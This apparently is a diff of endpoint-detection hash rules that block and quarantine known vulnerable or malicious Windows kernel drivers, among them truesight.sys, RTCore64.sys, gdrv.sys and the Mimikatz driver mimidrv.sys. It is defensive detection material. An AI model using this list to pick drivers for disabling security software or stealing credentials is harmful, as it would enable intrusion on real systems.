"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159933Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dd0a5c191a978babdeb51d51a04febf704eba136340779428d81ebc943ea414c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cc532f37-a6b6-55c9-ba2d-913f68dd3b66", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", 
+ "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828512Z", + "creation_date": "2026-03-23T11:45:31.828514Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828520Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6181015e118e8608d4566b40ba17989687fa2ea747c5f8f1905b5a234cfeebeb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cc54e382-f4eb-5e6d-bde3-a6f577ae4666", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819154Z", + "creation_date": "2026-03-23T11:45:31.819156Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819161Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "696cef6890b99a72a0f92b6bd3d9e5ad490f29974c559fda2242f85534585700", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cc5973e9-d3f5-5a2a-a478-1ed80d58e913", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830295Z", + "creation_date": "2026-03-23T11:45:30.830297Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830303Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bd6451ffd62f127371b838d4ab8e353df383b38b548f0cce33fa70cdad4ee13b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cc5e17e2-978f-5162-9e1c-dc42fca4d15f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", 
+ "last_update": "2026-03-23T11:45:30.829959Z", + "creation_date": "2026-03-23T11:45:30.829962Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829967Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "35ae4385e59c4ad684d6344ceb4c1fed53589fb56afb4b0c639bacd11356664c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cc5f6ed9-5fa8-5235-8991-3dd4a51267dc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811327Z", + "creation_date": "2026-03-23T11:45:31.811329Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811335Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3c428d3faddd8e0f6678ced8e923eed078877e5ee6cf7b2c20b29315f84b5a8b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cc5fa0d0-0654-55cd-ab17-687ba6bad1f4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456306Z", + "creation_date": "2026-03-23T11:45:30.456309Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456318Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "11bc55c0771d692279298211c1d434c04168e7c7f7c4328bfd600215b88c819b", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cc7033d3-76d0-5f11-8d6b-a5128db279d7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145018Z", + "creation_date": "2026-03-23T11:45:31.145020Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145025Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a03d159cd02bf1f8cda64a0843dd4ee7379dde9030985ede6c8a16e3b854c112", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cc719060-d526-59b9-a627-8860bbe62c15", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473514Z", + "creation_date": "2026-03-23T11:45:30.473517Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473526Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c84b0dbc0024c88c61a06d0aa7663a17a15e7c062f185811c5d85e1155e25aeb", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cc8750b8-4d37-5a54-8aec-dee239575a58", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606309Z", + "creation_date": "2026-03-23T11:45:29.606312Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606319Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ee24071d9a0ef38dc98929cfb4d316f9fb010de107c110fad2403022cf1eebfc", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cc890b60-3935-5bd3-a1f1-a8dd4f623dd9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823845Z", + "creation_date": "2026-03-23T11:45:30.823848Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823853Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "60744995c1eb14063a6f33e17c77f081c05a4e7bc4d4154e291a70d74d44efce", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cca11486-603e-578d-ba67-e7a279a86c8c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816748Z", + "creation_date": "2026-03-23T11:45:30.816750Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816756Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d8fc8e3a1348393c5d7c3a84bcbae383d85a4721a751ad7afac5428e5e579b4e", + "comment": "Vulnerable Kernel Driver (aka WiRwaDrv.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ccb4faf1-d1de-5882-8ccf-161101d53056", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812028Z", + "creation_date": "2026-03-23T11:45:31.812030Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812035Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c891c2b8dc44d5b8c3156011f3daed4c15f88987ac712f5500e2b1f5248320e0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ccb50528-c00c-538c-8329-5946a44a33ed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607276Z", + "creation_date": "2026-03-23T11:45:29.607278Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607283Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "40061b30b1243be76d5283cbc8abfe007e148097d4de7337670ff1536c4c7ba1", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] 
[https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ccb56504-0f4b-5314-8590-1fe56ae9466f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608968Z", + "creation_date": "2026-03-23T11:45:29.608970Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608975Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "133e542842656197c5d22429bd56d57aa33c9522897fdf29853a6d321033c743", + "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ccc1ba0b-b9a5-52dc-ad3c-5e5c5f484ad8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468433Z", + "creation_date": "2026-03-23T11:45:30.468437Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": 
true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468445Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ba467c6edee7266721c220fbc84cb80c995d429052846865d869609602d6e48c", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cccd6743-9e7d-5fcb-9711-b5aa0d58db4e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814414Z", + "creation_date": "2026-03-23T11:45:31.814417Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814425Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "386b6aef03c78da2152aa5a111334233a101e5f2b64da7ac1acd48df07cad8fd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cce8da9f-c3bc-54d2-a25d-346d2c879ae5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825707Z", + "creation_date": "2026-03-23T11:45:30.825709Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825715Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7a6191d9bf3893260b98fdbb7fe591995ef808d0dfb9fdf0f8adc4c8e3807e39", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cce93915-2169-5854-87c8-535c4d845953", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140436Z", + "creation_date": "2026-03-23T11:45:31.140439Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140445Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "ffbf8df7ebe5e9e986234df80d2dfe4a1c9e0c80c754ab083dca23adc479338c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cce96201-b970-5d98-a01f-b914aa626df2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485193Z", + "creation_date": "2026-03-23T11:45:31.485197Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485207Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f666e4c15474b933cef24d8fbec5d0548b4d8e29c8234a294f6b8d34b5a69ba0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ccebfc93-742d-552d-8679-b9f557c1a0f1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157275Z", + "creation_date": "2026-03-23T11:45:31.157278Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157292Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "11a31fe46d741ac5b1c369ba7befee1c1662c9e1ba742b59fd06fe7dc622ad3b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ccec40e6-65cb-5df2-9568-694de4162a84", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153823Z", + "creation_date": "2026-03-23T11:45:31.153825Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153830Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "529772e2f822515b4beb7c757ba6b24f92425da9d9001e3acdeeb66acbdcb89c", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ccfd2488-c74b-5836-9e9b-c56525f8b71b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143187Z", + "creation_date": "2026-03-23T11:45:32.143189Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143195Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9", + "comment": "Vulnerable Kernel Driver (aka iQVW64.SYS) [https://www.loldrivers.io/drivers/4dd3289c-522c-4fce-b48e-5370efc90fa1/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cd070543-98d2-50b8-941a-6aef5cf04953", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.824216Z", + "creation_date": "2026-03-23T11:45:31.824219Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824227Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7fe9d82bbc96b5f06ba26cda470e65a2635a4278a756a83bc3f194f82ca876c6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cd0795cf-0012-5929-818e-bfa2e5b125e5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825762Z", + "creation_date": "2026-03-23T11:45:30.825764Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825770Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cc9c84e903cf4f38679ced83da831a3e0b1f52a67af63584dcd460ef37b2979f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
